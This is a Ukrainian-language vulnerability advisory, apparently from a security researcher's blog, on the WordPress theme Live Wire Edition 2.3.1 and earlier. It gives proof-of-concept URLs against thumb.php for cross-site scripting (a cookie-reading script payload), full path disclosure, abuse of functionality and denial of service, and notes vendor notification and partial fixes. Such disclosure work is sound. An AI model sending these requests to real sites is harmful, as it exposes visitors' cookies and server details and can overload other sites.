Уразливості в темі Live Wire Edition для WordPress
15:05 08.04.201101.02.2011
У грудні, 08.12.2008, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Live Wire Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в різних шаблонах для WP, зокрема в 2007 році я писав про XSS в темах Blix та Blix Rus для WordPress.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.
08.04.2011
XSS:
http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure:
http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire-edition/
А також ще 30 php-скриптів шаблону в папці /livewire-edition/ та всіх підпапках.
Abuse of Functionality:
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1
DoS:
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1
Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.
Окрім папки /livewire-edition/, дана тема також може розміщуватися в папці /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).
Уразливі Live Wire Edition 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.